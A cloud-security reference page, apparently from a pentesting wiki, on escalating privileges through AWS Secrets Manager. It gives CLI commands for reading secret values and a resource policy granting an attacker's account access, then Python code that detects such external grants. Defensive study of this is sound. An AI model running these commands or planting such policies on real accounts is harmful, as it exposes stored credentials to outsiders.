AWS - Secrets Manager Privesc
Secrets Manager
For more information about Secrets Manager, see:
secretsmanager:GetSecretValue
An attacker with this permission can read the value stored inside a secret in AWS Secrets Manager.
aws secretsmanager get-secret-value --secret-id <secret_name> # Get value
Potential Impact: Access to highly sensitive data inside the AWS Secrets Manager service.
Warning
Note that even with the secretsmanager:BatchGetSecretValue permission, an attacker will also need secretsmanager:GetSecretValue to retrieve the sensitive secrets.
secretsmanager:GetResourcePolicy, secretsmanager:PutResourcePolicy, (secretsmanager:ListSecrets)
With the permissions mentioned above it is possible to grant other principals/accounts (even external ones) access to the secret. Note that in order to read secrets encrypted with a KMS key, the user also needs access to the KMS key (more info in the KMS Enum page).
aws secretsmanager list-secrets
aws secretsmanager get-resource-policy --secret-id <secret_name>
aws secretsmanager put-resource-policy --secret-id <secret_name> --resource-policy file:///tmp/policy.json
policy.json:
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Principal": {
        "AWS": "arn:aws:iam::<attackers_account>:root"
      },
      "Action": "secretsmanager:GetSecretValue",
      "Resource": "*"
    }
  ]
}
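On the detection side, a resource policy like the one above can be caught by auditing each secret's policy for Allow statements that let a principal outside the owning account read the secret. The following is an added example, not code from the original page: the function names and the 12-digit account IDs are constructed placeholders, and the check ignores Condition, NotAction, NotPrincipal and service principals.

```python
import json
import re
from fnmatch import fnmatchcase

READ_ACTION = "secretsmanager:getsecretvalue"

# Constructed sample: same shape as policy.json above, placeholder account IDs.
SAMPLE_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [
        {"Sid": "AppRole", "Effect": "Allow",
         "Principal": {"AWS": "arn:aws:iam::111111111111:role/app"},
         "Action": "secretsmanager:GetSecretValue", "Resource": "*"},
        {"Effect": "Allow",
         "Principal": {"AWS": "arn:aws:iam::999999999999:root"},
         "Action": ["secretsmanager:Describe*", "secretsmanager:Get*"], "Resource": "*"},
    ],
})

def _as_list(value):
    """IAM policy fields may hold one string or a list of strings."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]

def _account_of(principal):
    """Account ID from a bare ID or an IAM/STS ARN; None if it cannot be resolved."""
    m = re.fullmatch(r"(\d{12})|arn:aws[\w-]*:(?:iam|sts)::(\d{12}):.+", principal)
    return (m.group(1) or m.group(2)) if m else None

def external_read_grants(policy_json, owner_account):
    """Return (statement label, principal) pairs that Allow GetSecretValue to a
    wildcard, an unresolvable principal, or an account other than owner_account."""
    findings = []
    for i, stmt in enumerate(_as_list(json.loads(policy_json).get("Statement"))):
        if stmt.get("Effect") != "Allow":
            continue
        # Action patterns are case-insensitive and may contain * and ? wildcards.
        patterns = [a.lower() for a in _as_list(stmt.get("Action"))]
        if not any(fnmatchcase(READ_ACTION, p) for p in patterns):
            continue
        principal = stmt.get("Principal")
        if isinstance(principal, dict):
            principals = _as_list(principal.get("AWS"))
        else:
            principals = ["*"] if principal == "*" else []
        for p in principals:
            if p == "*" or _account_of(p) != owner_account:
                findings.append((stmt.get("Sid", f"statement[{i}]"), p))
    return findings
```

The `policy_json` argument is the `ResourcePolicy` string returned by `aws secretsmanager get-resource-policy`; any finding should also be checked against the key policy of the secret's KMS key, since the external principal needs access to that key as well.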

